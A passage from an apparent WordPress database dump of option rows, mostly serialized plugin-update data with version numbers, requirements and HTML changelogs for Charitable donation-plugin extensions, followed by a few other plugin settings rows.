tab.</li>\n<li>Store Stripe plans with currency and with distinction between live/test mode.</li>\n</ul>\n<p>1.0.4<br />\n<em>May 9, 2017</em></p>\n<ul>\n<li>Pull billing period and interval from donation meta to be more flexible going forward.</li>\n<li>Added check to prevent sending emails repeatedly.</li>\n</ul>\n<p>1.0.3<br />\n<em>April 26, 2017</em></p>\n<ul>\n<li>Hide One-Time vs Monthly tabs if no suggested one-time donations.</li>\n</ul>\n<p>1.0.2<br />\n<em>April 21, 2017</em></p>\n<ul>\n<li>Added better support for the donations widget.</li>\n</ul>\n<p>1.0.1<br />\n<em>March 17, 2017</em></p>\n<ul>\n<li>Due to some updates in Charitable itself recently, the suggested amounts for recurring donations were including phantom $0 per month donation options. That made no sense, so we\'ve fixed that up.</li>\n</ul>\n<p>1.0.0 - Official public release<br />\n<em>February 7, 2017</em></p>\n<ul>\n<li>Fixed a bug that caused recurring donations to be made when making a one-time donation with a custom amount.</li>\n</ul>\n<p>1.0.0-RC-3<br />\n<em>January 17, 2017</em></p>\n<ul>\n<li>Correctly set up the donation form with all required Javascript for recurring donations when the form is loaded in a modal outside a single campaign page.</li>\n<li>Ensures the correct date is shown on the donation receipt, regardless of your date format.</li>\n<li>Fixes a bug with the renewal emails not being saved correctly.</li>\n<li>Fixes a parser error for sites running on PHP 5.2.</li>\n<li>Various other small bug fixes and improvements.</li>\n</ul>\n<p>1.0.0-RC-1<br />\n<em>October 27, 2016</em></p>\n<ul>\n<li>First private beta release.</li>\n</ul>\n\";}\";}i:15;a:11:{s:11:\"download_id\";s:6:\"413576\";s:4:\"name\";s:25:\"Charitable Donor Comments\";s:11:\"new_version\";s:5:\"1.3.0\";s:4:\"slug\";s:25:\"charitable-donor-comments\";s:3:\"url\";s:78:\"https://www.wpcharitable.com/extensions/charitable-donor-comments/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-07 08:58:59\";s:8:\"homepage\";s:66:\"https://www.wpcharitable.com/extensions/charitable-donor-comments/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:1:{s:10:\"charitable\";s:5:\"1.7.0\";}s:8:\"sections\";s:1194:\"a:2:{s:11:\"description\";s:73:\"<p>Give your donors the ability to share a message when they donate.</p>\n\";s:9:\"changelog\";s:1062:\"<p>1.3.0<br />\n<em>November 1, 2023</em></p>\n<ul>\n<li>Updates related to Campaign Builder release in Charitable 1.8.0.</li>\n</ul>\n<p>1.2.0<br />\n<em>December 10, 2020</em></p>\n<ul>\n<li>Enable/disable comments on a per campaign basis.</li>\n</ul>\n<p>1.1.2<br />\n<em>September 24, 2020</em></p>\n<ul>\n<li>Do not save WP_Error as the donor comment when a comment fails to be created.</li>\n</ul>\n<p>1.1.1<br />\n<em>November 20, 2019</em></p>\n<ul>\n<li>When donations are grouped by donor in the Donors shortcode or widget, do not try to get a comment for donors without an email address.</li>\n<li>Added the charitable_donor_comments_donor_comments_args filter to allow extensions to filter the arguments used to get the most recent comment by a donor.</li>\n<li>Removed unused DB_VERSION class constant.</li>\n</ul>\n<p>1.1.0<br />\n<em>August 9, 2019</em></p>\n<ul>\n<li>Add comments to the Donations export.</li>\n<li>Add donor comments as filterable type in Comments list table.</li>\n</ul>\n<p>1.0.0<br />\n<em>December 13, 2017</em></p>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";}\";}i:16;a:11:{s:11:\"download_id\";s:7:\"2412211\";s:4:\"name\";s:21:\"Charitable Fee Relief\";s:11:\"new_version\";s:5:\"1.2.1\";s:4:\"slug\";s:21:\"charitable-fee-relief\";s:3:\"url\";s:74:\"https://www.wpcharitable.com/extensions/charitable-fee-relief/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-05-13 16:59:26\";s:8:\"homepage\";s:62:\"https://www.wpcharitable.com/extensions/charitable-fee-relief/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"5.3\";s:10:\"charitable\";s:5:\"1.6.8\";}s:8:\"sections\";s:5610:\"a:2:{s:11:\"description\";s:112:\"<p>Bump up your donations by giving your donors the option to cover the processing fees on their donations.</p>\n\";s:9:\"changelog\";s:5438:\"<p>1.2.1<br />\n<em>May 13, 2025</em></p>\n<ul>\n<li>Fixed issue involving Gift Aid calucations on donation form.</li>\n<li>Fixed issue involving saving optionsin Charitable Pro.</li>\n</ul>\n<p>1.2.0<br />\n<em>March 29, 2025</em></p>\n<ul>\n<li>Updated to be compatible with Charitable Pro.</li>\n</ul>\n<p>1.1.16<br />\n<em>May 24, 2024</em></p>\n<ul>\n<li>Resolved issue with email tag not including fees upon the first time the email is sent, although correct in email resends.</li>\n</ul>\n<p>1.1.15<br />\n<em>May 1, 2024</em></p>\n<ul>\n<li>Resolved issue with alt fee relief calculation on post-donation form calculations.</li>\n</ul>\n<p>1.1.14<br />\n<em>February 14, 2024</em></p>\n<ul>\n<li>Resolved fatal error with older PHP versions.</li>\n</ul>\n<p>1.1.13<br />\n<em>November 28, 2023</em></p>\n<ul>\n<li>Added capability with new campaign visual builder.</li>\n</ul>\n<p>1.1.12<br />\n<em>December 30, 2022</em></p>\n<ul>\n<li>Add a setting to offer an alternative slightly different formula to calculate fee.</li>\n</ul>\n<p>1.1.11<br />\n<em>September 29, 2022</em></p>\n<ul>\n<li>Fix: Resolves a fatal error when Stripe Connect 1.5.x is upgraded and used.</li>\n</ul>\n<p>1.1.10<br />\n<em>March 21, 2022</em></p>\n<ul>\n<li>Fixes a bug preventing Fee Relief from working correctly when there are multiple donation forms on the same page.</li>\n</ul>\n<p>1.1.9<br />\n<em>January 6, 2022</em></p>\n<ul>\n<li>Fixes a bug when using Stripe Checkout ona site where commas are the decimal separator.</li>\n</ul>\n<p>1.1.8<br />\n<em>December 23, 2021</em></p>\n<ul>\n<li>Fixes issues with incorrect handling of sites using commas as the decimal separator.</li>\n<li>Fixes bug preventing translations from loading as expected.</li>\n</ul>\n<p>1.1.7<br />\n<em>May 14, 2021</em></p>\n<ul>\n<li>Fixes incorrect handling of recurring donations where fees are covered. Previously, these would be charged the correct amount but would show up in the Charitable dashboard as not having fees covered.</li>\n</ul>\n<p>1.1.6<br />\n<em>November 16, 2020</em></p>\n<ul>\n<li>Fixes an error preventing fees from being recorded correctly, despite donors opting in.</li>\n</ul>\n<p>1.1.5<br />\n<em>November 6, 2020</em></p>\n<ul>\n<li>Avoid errors for donations marked as having fees covered, but with no fees charged.</li>\n</ul>\n<p>1.1.4<br />\n<em>October 8, 2020</em></p>\n<ul>\n<li>Fixes an error when grouping donations by the same donor in the Donors shortcode/widget.</li>\n<li>When saving a gateway configuration with 0 set for the percentage &amp; fixed fees, mark it as disabled.</li>\n</ul>\n<p>1.1.3<br />\n<em>September 24, 2020</em></p>\n<ul>\n<li>Include processing fee in donation amount in Donors shortcode/widget.</li>\n</ul>\n<p>1.1.2<br />\n<em>September 20, 2020</em></p>\n<ul>\n<li>Added small tweak required for upcoming Recurring Donations update.</li>\n</ul>\n<p>1.1.1<br />\n<em>April 28, 2020</em></p>\n<ul>\n<li>Fixed issue where PayPal recurring donations would be marked as Failed if the donation included fees.</li>\n</ul>\n<p>1.1.0<br />\n<em>April 24, 2020</em></p>\n<ul>\n<li>Added support for Windcave payment gateway.</li>\n<li>Added support for Braintree payment gateway (currently in private beta).</li>\n<li>Ensure that the site decimal count setting is respected when saving the fee.</li>\n</ul>\n<p>1.0.8<br />\n<em>March 7, 2020</em></p>\n<ul>\n<li>Fixes a minor error encountered on recurring donations where fees are covered and payment is via Stripe Checkout.</li>\n</ul>\n<p>1.0.7<br />\n<em>March 3, 2020</em></p>\n<ul>\n<li>Fixed support for Stripe Checkout.</li>\n<li>Avoid fatal errors when a donation with fee relief is deleted.</li>\n</ul>\n<p>1.0.6<br />\n<em>November 12, 2019</em></p>\n<ul>\n<li>Added fee amount &amp; whether the fees was covered to the Recurring Donations export.</li>\n<li>Fixed a bug preventing the fee relief field from appearing automatically when an amount is pre-set in the donation form.</li>\n<li>Fixed a Javascript error encountered when an amount is pre-set in the donation form.</li>\n<li>Add the amount of the donation fee paid by the donor to the Stripe metadata.</li>\n<li>Fixed Javascript performance issue causing page to stall if you change the suggested donation amount repeatedly.</li>\n</ul>\n<p>1.0.5<br />\n<em>September 10, 2019</em></p>\n<ul>\n<li>Update to handle changes coming in Recurring Donations 1.1</li>\n</ul>\n<p>1.0.4<br />\n<em>June 26, 2019</em></p>\n<ul>\n<li>Avoid fatal error on recurring donation receipt.</li>\n<li>Include processing fees in recurring donation amount.</li>\n<li>Prevent loading Fee Relief Javascript files for the donation amount form.</li>\n<li>Added support for Stripe\'s Payment Intents API. This will not do anything until a later update to Charitable Stripe.</li>\n</ul>\n<p>1.0.3<br />\n<em>May 23, 2019</em></p>\n<ul>\n<li>Fixed fatal error that could happen when viewing donations in the admin where the donor did not agree to pay the processing fees.</li>\n</ul>\n<p>1.0.2<br />\n<em>March 8, 2019</em></p>\n<ul>\n<li>Fixed error that prevented fee relief field from appearing on forms embedded with [charitable_donation_form].</li>\n<li>Removed unused DB_VERSION constant from Charitable_Fee_Relief class.</li>\n</ul>\n<p>1.0.1<br />\n<em>January 29, 2019</em></p>\n<ul>\n<li>Removed reference to non-existent class in Stripe extension. This caused a fatal error.</li>\n<li>Fixes notices thrown when a site uses a comma for the decimal separator.</li>\n</ul>\n<p>1.0.0<br />\n<em>January 9, 2019</em></p>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";}\";}i:17;a:11:{s:11:\"download_id\";s:7:\"4032296\";s:4:\"name\";s:19:\"Charitable Windcave\";s:11:\"new_version\";s:5:\"1.0.2\";s:4:\"slug\";s:19:\"charitable-windcave\";s:3:\"url\";s:72:\"https://www.wpcharitable.com/extensions/charitable-windcave/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-07 09:07:32\";s:8:\"homepage\";s:60:\"https://www.wpcharitable.com/extensions/charitable-windcave/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"5.6\";s:10:\"charitable\";s:6:\"1.6.38\";}s:8:\"sections\";s:500:\"a:2:{s:11:\"description\";s:75:\"<p>Accept donations securely with Windcave (formerly Payment Express).</p>\n\";s:9:\"changelog\";s:367:\"<p>1.0.2<br />\n<em>May 13, 2020</em></p>\n<ul>\n<li>Fix parser error. This issue seemed to only crop up on certain hosting configurations.</li>\n</ul>\n<p>1.0.1<br />\n<em>May 8, 2020</em></p>\n<ul>\n<li>Resolved issue preventing donations from getting marked as Paid automatically.</li>\n</ul>\n<p>1.0.0<br />\n<em>April 24, 2020</em></p>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";}\";}i:18;a:11:{s:11:\"download_id\";s:7:\"4930345\";s:4:\"name\";s:20:\"Charitable Braintree\";s:11:\"new_version\";s:5:\"1.0.5\";s:4:\"slug\";s:20:\"charitable-braintree\";s:3:\"url\";s:73:\"https://www.wpcharitable.com/extensions/charitable-braintree/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-04-23 07:07:27\";s:8:\"homepage\";s:61:\"https://www.wpcharitable.com/extensions/charitable-braintree/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.2\";s:10:\"charitable\";s:6:\"1.6.43\";}s:8:\"sections\";s:1841:\"a:2:{s:11:\"description\";s:113:\"<p>Accept donations with Braintree, with support for card payments, PayPal, Apple Pay, Google Pay and Venmo.</p>\n\";s:9:\"changelog\";s:1668:\"<p>1.1.0<br />\n<em>April 23, 2025</em></p>\n<ul>\n<li>Upgrade Braintree PHP SDK to version 6.24.0.</li>\n</ul>\n<p>1.0.5<br />\n<em>February 17, 2023</em></p>\n<ul>\n<li>Fixes \"invalid currency format\" issue if amount is over $1k when certain Charitable addons hook into and modify the cost before the data is sent to Braintree.</li>\n</ul>\n<p>1.0.4<br />\n<em>February 22, 2022</em></p>\n<ul>\n<li>Fixes a problem preventing scripts from loading when displaying the donation form on a separate page.</li>\n</ul>\n<p>1.0.3<br />\n<em>February 11, 2022</em></p>\n<ul>\n<li>Prevent loading of Braintree fields if the gateway has not been activated.</li>\n<li>Fixes a problem with scripts not loading in the donation form when using a block theme.</li>\n<li>Fixes a bug preventing plugin translations from working as expected.</li>\n</ul>\n<p>1.0.2<br />\n<em>November 3, 2021</em></p>\n<ul>\n<li>Catch and log any exceptions when generating client token to avoid fatal errors.</li>\n<li>Updated Braintree to use most recent Drop-in UI script, which adds support for Venmo to be used in desktop.</li>\n<li>Correctly handles the payment amount for recurring donations on sites where commas are used as the decimal separator.</li>\n</ul>\n<p>1.0.1<br />\n<em>December 17, 2020</em></p>\n<ul>\n<li>When using commas as the decimal separator, the line item amount sent to Braintree was incorrect, even though the total donation amount is correct.</li>\n<li>Fixed bug where having Braintree activated but not enabled as a gateway would result in recurring donations not working correctly in other payment gateways.</li>\n</ul>\n<p>1.0.0<br />\n<em>August 28, 2020</em></p>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";}\";}i:19;a:11:{s:11:\"download_id\";s:7:\"5820982\";s:4:\"name\";s:17:\"Charitable Mollie\";s:11:\"new_version\";s:5:\"1.0.4\";s:4:\"slug\";s:17:\"charitable-mollie\";s:3:\"url\";s:70:\"https://www.wpcharitable.com/extensions/charitable-mollie/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-07 08:56:36\";s:8:\"homepage\";s:58:\"https://www.wpcharitable.com/extensions/charitable-mollie/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.2\";s:10:\"charitable\";s:6:\"1.6.43\";}s:8:\"sections\";s:1488:\"a:2:{s:11:\"description\";s:146:\"<p>Accept donations with Mollie and support leading European payment methods like Apple Pay, credit card, iDEAL, SEPA, Sofort and Bancontact.</p>\n\";s:9:\"changelog\";s:1282:\"<p>1.0.4<br />\n<em>December 21, 2022</em></p>\n<ul>\n<li>Resolves fatal error upon install with 1.7+ Charitable.</li>\n</ul>\n<p>1.0.3<br />\n<em>February 28, 2022</em></p>\n<ul>\n<li>Resolves a problem where renewal donations are not processed correctly, resulting in duplicates in the admin.</li>\n</ul>\n<p>1.0.2<br />\n<em>December 24, 2021</em></p>\n<ul>\n<li>Fixes an error on sites where Recurring Donations is not active.</li>\n</ul>\n<p>1.0.1<br />\n<em>December 21, 2021</em></p>\n<ul>\n<li>Fixes a bug that prevented subscriptions from being created in Mollie in certain cases. If you have recurring donations that were processed through Mollie, there is a chance that the subscription has not been set up correctly in Mollie.<br />\n        To check and to create the subscription, navigate to any recurring donations that have a status of Active. In the Donation Actions meta box, check the dropdown list for an action called \"Create Missing Mollie Subscription\". If you see this option in your dropdown list, the subscription was most likely not set up and you can use the action to automatically set one up in Mollie. If you don\'t see the option listed, the subscription was created correctly.</li>\n</ul>\n<p>1.0.0<br />\n<em>April 30, 2021</em></p>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";}\";}i:20;a:11:{s:11:\"download_id\";s:7:\"5887768\";s:4:\"name\";s:19:\"Charitable Paystack\";s:11:\"new_version\";s:5:\"1.0.1\";s:4:\"slug\";s:19:\"charitable-paystack\";s:3:\"url\";s:72:\"https://www.wpcharitable.com/extensions/charitable-paystack/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-07 09:05:40\";s:8:\"homepage\";s:60:\"https://www.wpcharitable.com/extensions/charitable-paystack/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.2\";s:10:\"charitable\";s:6:\"1.6.45\";}s:8:\"sections\";s:328:\"a:2:{s:11:\"description\";s:76:\"<p>Accept donations with Paystack, the leading African payment gateway.</p>\n\";s:9:\"changelog\";s:194:\"<p>1.0.1<br />\n<em>December 28, 2022</em></p>\n<ul>\n<li>Fixed issues related to using Charitable 1.7.0+</li>\n</ul>\n<p>1.0.0<br />\n<em>March 12, 2021</em></p>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";}\";}i:21;a:11:{s:11:\"download_id\";s:7:\"7454952\";s:4:\"name\";s:29:\"Charitable Automation Connect\";s:11:\"new_version\";s:5:\"1.2.0\";s:4:\"slug\";s:29:\"charitable-automation-connect\";s:3:\"url\";s:82:\"https://www.wpcharitable.com/extensions/charitable-automation-connect/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-03-29 18:25:58\";s:8:\"homepage\";s:70:\"https://www.wpcharitable.com/extensions/charitable-automation-connect/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.2\";s:10:\"charitable\";s:6:\"1.6.53\";}s:8:\"sections\";s:1552:\"a:2:{s:11:\"description\";s:158:\"<p>Connect Charitable to your favourite apps by creating automatic workflows with automation platforms like Zapier, Zoho Flow, Integromat or Automate.io.</p>\n\";s:9:\"changelog\";s:1334:\"<p>1.2.0<br />\n<em>March 29, 2025</em></p>\n<ul>\n<li>Updated to be compatible with Charitable Pro.</li>\n</ul>\n<p>1.1.1<br />\n<em>February 2, 2023</em></p>\n<ul>\n<li>Resolved issue when webhook status was not being saved (example: chaning webhook to disabled).</li>\n<li>Updated way webooks communicated (using a more secure method with WordPress wp_safe_remote_request() and wp_remote_request(). To prevent distruption of current users automation, you must add \'define( \'CHARITABLE_AUTOMATE_V2\', true );\' to your wp-config.php to override the (now) legacy method.</li>\n</ul>\n<p>1.0.3<br />\n<em>March 11, 2022</em></p>\n<ul>\n<li>Small fix to make sure the Automation Connect row on the Plugins page shows a quick link to access webhook subscriptions.</li>\n</ul>\n<p>1.0.2<br />\n<em>November 29, 2021</em></p>\n<ul>\n<li>Fixed a problem introduced by the previous release which removed certain fields from the data sent in webhooks.</li>\n</ul>\n<p>1.0.1<br />\n<em>November 25, 2021</em></p>\n<ul>\n<li>Fixed an issue with the way the data is generated to show fields added via the payload filters.</li>\n<li>Added the ability to include fields in the webhook data when registering the field, by passing a show_in_webhook argument and setting it to true.</li>\n</ul>\n<p>1.0.0<br />\n<em>October 22, 2021</em></p>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";}\";}i:22;a:11:{s:11:\"download_id\";s:7:\"6056139\";s:4:\"name\";s:18:\"Charitable Payrexx\";s:11:\"new_version\";s:5:\"1.0.3\";s:4:\"slug\";s:18:\"charitable-payrexx\";s:3:\"url\";s:71:\"https://www.wpcharitable.com/extensions/charitable-payrexx/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-07 09:03:10\";s:8:\"homepage\";s:59:\"https://www.wpcharitable.com/extensions/charitable-payrexx/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.2\";s:10:\"charitable\";s:6:\"1.6.51\";}s:8:\"sections\";s:586:\"a:2:{s:11:\"description\";s:62:\"<p>Accept donations in over 200 payment methods globally.</p>\n\";s:9:\"changelog\";s:466:\"<p>1.0.3<br />\n<em>January 16, 2023</em></p>\n<ul>\n<li>Resolve error message on gateway webhook.</li>\n</ul>\n<p>1.0.2<br />\n<em>January 1, 2023</em></p>\n<ul>\n<li>Resolve fatal error on install.</li>\n</ul>\n<p>1.0.1<br />\n<em>January 27, 2022</em></p>\n<ul>\n<li>Minor update to resolve problem with a persistent nag to update to the latest plugin version, despite being on it.</li>\n</ul>\n<p>1.0.0<br />\n<em>December 10, 2021</em></p>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";}\";}i:23;a:11:{s:11:\"download_id\";s:7:\"8287423\";s:4:\"name\";s:21:\"Charitable GoCardless\";s:11:\"new_version\";s:5:\"1.0.1\";s:4:\"slug\";s:21:\"charitable-gocardless\";s:3:\"url\";s:74:\"https://www.wpcharitable.com/extensions/charitable-gocardless/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-07 09:00:56\";s:8:\"homepage\";s:62:\"https://www.wpcharitable.com/extensions/charitable-gocardless/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.2\";s:10:\"charitable\";s:6:\"1.6.55\";}s:8:\"sections\";s:320:\"a:2:{s:11:\"description\";s:50:\"<p>Save on transaction costs with GoCardless.</p>\n\";s:9:\"changelog\";s:212:\"<p>1.0.1<br />\n<em>May 30, 2023</em></p>\n<ul>\n<li>Fix fatal error upon updating and installing with Charitable 1.7.0+.</li>\n</ul>\n<p>1.0.0<br />\n<em>February 28, 2022</em></p>\n<ul>\n<li>Initial release</li>\n</ul>\n\";}\";}i:24;a:11:{s:11:\"download_id\";s:7:\"8455513\";s:4:\"name\";s:26:\"Charitable Annual Receipts\";s:11:\"new_version\";s:5:\"1.1.0\";s:4:\"slug\";s:26:\"charitable-annual-receipts\";s:3:\"url\";s:79:\"https://www.wpcharitable.com/extensions/charitable-annual-receipts/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-03-29 18:39:26\";s:8:\"homepage\";s:67:\"https://www.wpcharitable.com/extensions/charitable-annual-receipts/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.2\";s:10:\"charitable\";s:6:\"1.6.57\";}s:8:\"sections\";s:757:\"a:2:{s:11:\"description\";s:93:\"<p>Help your donors with their record keeping by providing downloadable annual receipts.</p>\n\";s:9:\"changelog\";s:606:\"<p>1.1.0<br />\n<em>March 31, 2025</em></p>\n<ul>\n<li>Updated for Charitable Pro.</li>\n</ul>\n<p>1.0.3<br />\n<em>February 23, 2024</em></p>\n<ul>\n<li>Corrected PHP warnings in the PDF template when PDF are generated.</li>\n</ul>\n<p>1.0.2<br />\n<em>December 5, 2022</em></p>\n<ul>\n<li>Updated how contact details are presented in general tab.</li>\n</ul>\n<p>1.0.1<br />\n<em>April 7, 2022</em></p>\n<ul>\n<li>Updated the PDF generation package to the latest version, which is required for full compatibility with PDF Receipts.</li>\n</ul>\n<p>1.0.0<br />\n<em>March 30, 2022</em></p>\n<ul>\n<li>Initial release</li>\n</ul>\n\";}\";}i:25;a:11:{s:11:\"download_id\";s:7:\"8525539\";s:4:\"name\";s:23:\"Charitable PDF Receipts\";s:11:\"new_version\";s:5:\"1.0.1\";s:4:\"slug\";s:23:\"charitable-pdf-receipts\";s:3:\"url\";s:76:\"https://www.wpcharitable.com/extensions/charitable-pdf-receipts/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-07 19:24:11\";s:8:\"homepage\";s:64:\"https://www.wpcharitable.com/extensions/charitable-pdf-receipts/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.2\";s:10:\"charitable\";s:6:\"1.6.59\";}s:8:\"sections\";s:573:\"a:2:{s:11:\"description\";s:95:\"<p>Make life easy for your donors by providing them with a PDF receipt for their donation.</p>\n\";s:9:\"changelog\";s:420:\"<p>1.0.2<br />\n<em>January 30, 2023</em></p>\n<ul>\n<li>Added a missing CSS file for the PDF template.</li>\n</ul>\n<p>1.0.1<br />\n<em>May 6, 2022</em></p>\n<ul>\n<li>Only show the Download button in the donation receipt when the donation is marked as Paid.</li>\n<li>Fixed incorrect override file path in code comment in template files.</li>\n</ul>\n<p>1.0.0<br />\n<em>April 7, 2022</em></p>\n<ul>\n<li>Initial release</li>\n</ul>\n\";}\";}i:26;a:11:{s:11:\"download_id\";s:8:\"10098866\";s:4:\"name\";s:23:\"Charitable Spam Blocker\";s:11:\"new_version\";s:10:\"2.0.1 beta\";s:4:\"slug\";s:23:\"charitable-spam-blocker\";s:3:\"url\";s:76:\"https://www.wpcharitable.com/extensions/charitable-spam-blocker/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-07 09:10:28\";s:8:\"homepage\";s:64:\"https://www.wpcharitable.com/extensions/charitable-spam-blocker/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"5.3\";s:10:\"charitable\";s:7:\"1.7.0.6\";}s:8:\"sections\";s:471:\"a:2:{s:11:\"description\";s:60:\"<p>Add a Captcha to your donation form to prevent spam.</p>\n\";s:9:\"changelog\";s:353:\"<p>2.0.1 beta<br />\n<em>April 2, 2024</em></p>\n<ul>\n<li>Code cleanup, minor fixes.</li>\n</ul>\n<p>2.0.0 beta<br />\n<em>February 29, 2024</em></p>\n<ul>\n<li>Beta release containing rate limiting (Stripe), math field, and IP tracking per donations.</li>\n</ul>\n<p>1.0.5 beta<br />\n<em>December 7, 2022</em></p>\n<ul>\n<li>First public beta release.</li>\n</ul>\n\";}\";}i:27;a:11:{s:11:\"download_id\";s:8:\"10470791\";s:4:\"name\";s:17:\"Charitable Square\";s:11:\"new_version\";s:10:\"1.0.7 beta\";s:4:\"slug\";s:17:\"charitable-square\";s:3:\"url\";s:70:\"https://www.wpcharitable.com/extensions/charitable-square/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-03-27 10:14:06\";s:8:\"homepage\";s:58:\"https://www.wpcharitable.com/extensions/charitable-square/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"5.3\";s:10:\"charitable\";s:7:\"1.7.0.8\";}s:8:\"sections\";s:388:\"a:2:{s:11:\"description\";s:58:\"<p>Securely accept credit card donations with Square.</p>\n\";s:9:\"changelog\";s:272:\"<p>1.0.7<br />\n<em>December 20, 2024</em></p>\n<ul>\n<li>Resolved a PHP Fatal that might have effected webhook communications on certain PHP versions.</li>\n</ul>\n<p>1.0.6 - Official beta release<br />\n<em>February 7, 2023</em></p>\n<ul>\n<li>First beta release 12.</li>\n</ul>\n\";}\";}i:28;a:11:{s:11:\"download_id\";s:8:\"13035026\";s:4:\"name\";s:14:\"Charitable Pro\";s:11:\"new_version\";s:7:\"1.8.5.7\";s:4:\"slug\";s:21:\"charitable-pro-plugin\";s:3:\"url\";s:74:\"https://www.wpcharitable.com/extensions/charitable-pro-plugin/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-05-14 17:14:09\";s:8:\"homepage\";s:62:\"https://www.wpcharitable.com/extensions/charitable-pro-plugin/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.4\";s:10:\"charitable\";s:5:\"1.8.0\";}s:8:\"sections\";s:2025:\"a:2:{s:11:\"description\";s:0:\"\";s:9:\"changelog\";s:1967:\"<p>1.8.5.7<br />\n<em>May 13, 2025</em></p>\n<ul>\n<li>NEW: Custom text abilities for Stripe Checkout.</li>\n<li>FIX: Resolving an issue related to showing tab content in visual campaigns.</li>\n<li>FIX: Resolved issue involving upload/import buttons in tools export/import menus.</li>\n<li>FIX: Resolved issue with uploading logos for PDF Receipts.</li>\n<li>FIX: Tweaked code related to CSS and PHP standards.</li>\n</ul>\n<p>1.8.5.6<br />\n<em>April 26th, 2025</em></p>\n<ul>\n<li>FIX: Restored \"Attach PDF Receipt\" to email settings.</li>\n<li>FIX: Adjust how upgrade messages are displayed when other addons are accessing Charitable upgrade logs.</li>\n</ul>\n<p>1.8.5.5<br />\n<em>April 20th, 2025</em></p>\n<ul>\n<li>FIX: Resolved an issue regarding currency formatting in campaign visual builder for certain Charitable currency settings.</li>\n<li>FIX: Resolved several WordPress generated translation warnings.</li>\n<li>FIX: Improved sanitization on decimal count in admin general settings.</li>\n</ul>\n<p>1.8.5.4</p>\n<ul>\n<li>FIX: Resolved a fatal error involving donor referrals that occured in certain page loading scenarios.</li>\n<li>FIX: Fixed fatal interfering with Stripe on donation form submit in certain scenarios.</li>\n<li>FIX: Resolve display issue with donate amount field on campaigns (via visual builder).</li>\n<li>FIX: Resolved some minor PHP warnings.</li>\n</ul>\n<p>1.8.5.3<br />\n<em>April 3rd, 2025</em></p>\n<ul>\n<li>FIX: Resolved issue with appearing database upgrade message that wasn\'t clearing.</li>\n</ul>\n<p>1.8.5.2<br />\n<em>April 2nd, 2025</em></p>\n<ul>\n<li>FIX: Resolved issues in certain scenarios with other WordPress plugins in the addition and removal of Pro licenses.</li>\n</ul>\n<p>1.8.5.1<br />\n<em>April 1st, 2025</em></p>\n<ul>\n<li>UPDATED: Tweaks to Charitable admin UI and the CSS.</li>\n<li>FIX: Resolved an issue with warning notices not appearing.</li>\n</ul>\n<p>1.8.5.0<br />\n<em>March 31, 2025</em></p>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";}\";}s:13:\"request_speed\";d:0.00021696090698242188;}}','off'),(406994,'_wpforms_transient_wpforms_htaccess_file','a:3:{s:4:\"size\";i:737;s:5:\"mtime\";i:1723256907;s:5:\"ctime\";i:1723256907;}','yes'),(409218,'arm_lite_version_updated_date_4.0.27','2024-03-09 04:25:28','yes'),(420766,'rzp_rtb_enable','no','yes'),(420767,'rzp_rtb_feature_checked','yes','yes'),(424821,'woocommerce_remote_variant_assignment','110','yes'),(444391,'arm_lite_version_updated_date_4.0.28','2024-04-03 02:52:18','yes'),(449503,'arm_lite_version_updated_date_4.0.29','2024-04-08 03:08:20','yes'),(456105,'arm_lite_version_updated_date_4.0.30','2024-04-19 